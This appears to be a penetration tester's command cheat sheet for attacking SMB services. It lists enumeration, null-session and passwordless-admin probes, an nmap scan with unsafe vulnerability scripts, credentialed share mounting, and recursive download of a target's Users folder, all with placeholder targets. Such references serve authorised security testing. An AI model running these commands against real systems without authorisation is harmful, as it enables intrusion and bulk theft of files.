Target.Host.Service.SMB.txt

`` Check remote target access

    ~> net use \\VAR_TARGET_HOST\C$
    ~> dir \\VAR_TARGET_HOST\C$

`` Enumeration

    -- NetBIOS information
    ~$ nbtscan -vh VAR_TARGET_HOST

    -- Version if anything else fails
    ~$ smbver.sh

    -- Check for permissions first
    ~$ smbmap -H VAR_TARGET_HOST

    -- Anything more?
    ~$ enum4linux -a VAR_TARGET_HOST

    -- Null session allowed?
    ~$ smbclient -N -L VAR_TARGET_HOST
    ~> net use \\VAR_TARGET_HOST\IPC$ "" /u:""

    -- Passwordless admin?
    ~$ smbclient //VAR_TARGET_HOST/ipc$ -U Administrator

`` Vulnerability scanning

    ~$ nmap -v -n -p 139,445 -sS -g 53 --script=smb-double-pulsar-backdoor,"smb-enum-*",smb-ls,smb-mbenum,smb-enum-users,smb-os-discovery,smb-print-text,smb-psexec,smb-security-mode,smb-server-stats,"smb-vuln-*","smb2-*" --script-args=vulns.showall --script-args=unsafe=1 VAR_TARGET_HOST

`` Shares listing

    ~> net view \\VAR_TARGET_HOST /all
    ~$ smbmap -u VAR_USERNAME -p VAR_PASSWORD -H VAR_TARGET_HOST
    ~$ nmap --script smb-enum-shares -p139,445 -v -n --open VAR_TARGET_HOST
    ~$ smbclient -U "VAR_USERNAME%VAR_PASSWORD" \\\\VAR_DOMAIN\SYSVOL

`` Share mount

    ~$ mount -t cifs //VAR_TARGET_HOST/share /mnt/tmp -o,username=VAR_TARGET_DOMAIN/VAR_USERNAME,password=VAR_PASSWORD,vers=2.0
        # SMBv2

`` Various

    ~$ nbtscan -r VAR_TARGET_HOST
    ~$ smbclient //VAR_TARGET_HOST/ipc$
    ~$ smbclient //VAR_TARGET_HOST/admin$
    ~$ smbclient -W VAR_TARGET_DOMAIN -U user -L VAR_TARGET_HOST
    ~$ proxychains smbclient '//VAR_TARGET_HOST/C$' -U 'VAR_TARGET_DOMAIN/VAR_USERNAME%VAR_PASSWORD'

`` Recursive download

    ~$ smbclient -N //VAR_TARGET_HOST/C$
    smb: \> mask ""
    smb: \> prompt
    smb: \> recurse
    smb: \> mget Users